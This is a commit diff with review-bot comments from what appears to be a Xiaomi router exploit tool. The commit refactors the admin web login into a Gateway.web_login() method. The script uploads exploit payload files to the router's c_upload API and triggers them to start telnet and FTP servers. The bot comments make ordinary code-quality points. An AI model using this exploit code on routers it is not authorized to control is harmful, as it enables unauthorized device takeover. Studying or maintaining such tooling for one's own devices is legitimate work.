Add new method Gateway.web_login()

pull/3/head
remittor 3 years ago
parent c6b41f7605
commit 7d2bea5ee7

@ -44,23 +44,7 @@ print("mac = {}".format(gw.mac_address))
if gw.ping(verbose = 0) is True: if gw.ping(verbose = 0) is True:
die(0, "Exploit already installed and running") die(0, "Exploit already installed and running")
if not gw.nonce_key or not gw.mac_address: stok = gw.web_login()
die("Xiaomi Mi Wi-Fi device is wrong model or not the stock firmware in it.")
nonce = "0_" + gw.mac_address + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000))
password = input("Enter device WEB password: ")
account_str = (password + gw.nonce_key).encode('utf-8')
account_str = hashlib.sha1(account_str).hexdigest()
password = (nonce + account_str).encode('utf-8')
password = hashlib.sha1(password).hexdigest()
username = 'admin'
data = "username={username}&password={password}&logtype=2&nonce={nonce}".format(username = username, password = password, nonce = nonce)
requrl = "http://{ip_addr}/cgi-bin/luci/api/xqsystem/login".format(ip_addr = ip_addr)
r1 = requests.post(requrl, data = data, headers = get_http_headers())
try:
stok = re.findall(r'"token":"(.*?)"',r1.text)[0]
except Exception:
die("Password is not correct!")
dn_tmp = 'tmp/' dn_tmp = 'tmp/'
if gw.use_ssh: if gw.use_ssh:
@ -147,14 +131,13 @@ if tgz_size2 > 100*1024 - 128:
die("File size {} exceeds 100KiB".format(fn_payload2)) die("File size {} exceeds 100KiB".format(fn_payload2))
print("Start uploading the exploit with payload...") print("Start uploading the exploit with payload...")
urlapi = "http://{ip_addr}/cgi-bin/luci/;stok={stok}/api/".format(ip_addr = ip_addr, stok = stok)
if (fn_payload1): if (fn_payload1):
requests.post(urlapi + "misystem/c_upload", files={"image":open(fn_payload1, 'rb')}) requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload1, 'rb')})
if (fn_payload2): if (fn_payload2):
requests.post(urlapi + "misystem/c_upload", files={"image":open(fn_payload2, 'rb')}) requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload2, 'rb')})
if (fn_payload3): if (fn_payload3):
requests.post(urlapi + "misystem/c_upload", files={"image":open(fn_payload3, 'rb')}) requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload3, 'rb')})
time.sleep(1) time.sleep(1)
@ -163,7 +146,7 @@ if gw.use_ssh:
else: else:
print("Running TELNET and FTP servers...") print("Running TELNET and FTP servers...")
requests.get(urlapi + "xqnetdetect/netspeed") requests.get(gw.apiurl + "xqnetdetect/netspeed")
time.sleep(0.5) time.sleep(0.5)
gw.ping() gw.ping()
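Review bot: `stok = gw.web_login()` in the first hunk binds `None`, because the `web_login()` added by this commit stores the token in `self.stok` and has no return statement. The later hunks build their URLs from `gw.apiurl`, so nothing visible reads the local, but the leftover name invites a later `stok`-based URL that would silently contain the text `None`. Either call it as a bare statement, `gw.web_login()`, or end the method with `return self.stok`. The script's statements begin and end outside the hunks shown, so other uses of `stok` cannot be ruled out from here.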

@ -61,6 +61,7 @@ class Gateway():
mac_address = None mac_address = None
nonce_key = None nonce_key = None
webpassword = None webpassword = None
stok = None
status = -2 status = -2
ftp = None ftp = None
socket = None # TCP socket for SSH socket = None # TCP socket for SSH
@ -136,6 +137,32 @@ class Gateway():
self.status = 1 self.status = 1
return self.status return self.status
def web_login(self):
self.stok = None
if not self.nonce_key or not self.mac_address:
die("Xiaomi Mi Wi-Fi device is wrong model or not the stock firmware in it.")
nonce = "0_" + self.mac_address + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000))
if not self.webpassword:
self.webpassword = input("Enter device WEB password: ")
password = self.webpassword
account_str = (password + self.nonce_key).encode('utf-8')
account_str = hashlib.sha1(account_str).hexdigest()
password = (nonce + account_str).encode('utf-8')
password = hashlib.sha1(password).hexdigest()
username = 'admin'
data = "username={username}&password={password}&logtype=2&nonce={nonce}".format(username = username, password = password, nonce = nonce)
requrl = "http://{ip_addr}/cgi-bin/luci/api/xqsystem/login".format(ip_addr = self.ip_addr)
r1 = requests.post(requrl, data = data, headers = get_http_headers())
try:
stok = re.findall(r'"token":"(.*?)"',r1.text)[0]
except Exception:
die("WEB password is not correct!")
self.stok = stok
@property
def apiurl(self):
return "http://{ip_addr}/cgi-bin/luci/;stok={stok}/api/".format(ip_addr = self.ip_addr, stok = self.stok)
def shutdown(self): def shutdown(self):
if self.use_ssh: if self.use_ssh:
try: try:
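Review bot: The password prompt in `web_login()` uses `input()`, which echoes the router's admin password to the terminal and into any scrollback or session recording; `self.webpassword = getpass.getpass("Enter device WEB password: ")` avoids that (it needs `import getpass`, and the file's import block is not visible here). Separately, the `except Exception` around the token lookup reports every unexpected response as "WEB password is not correct!"; checking `r1.status_code` and catching only `IndexError` would tell a wrong password apart from a device or HTTP error. The `apiurl` property also formats `stok=None` into the URL when login has not run or has failed, so a guard such as `if not self.stok: die("Not logged in")` would fail early instead of sending a malformed request. `web_login()` and `apiurl` are fully inside this hunk; `shutdown()` continues past it.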
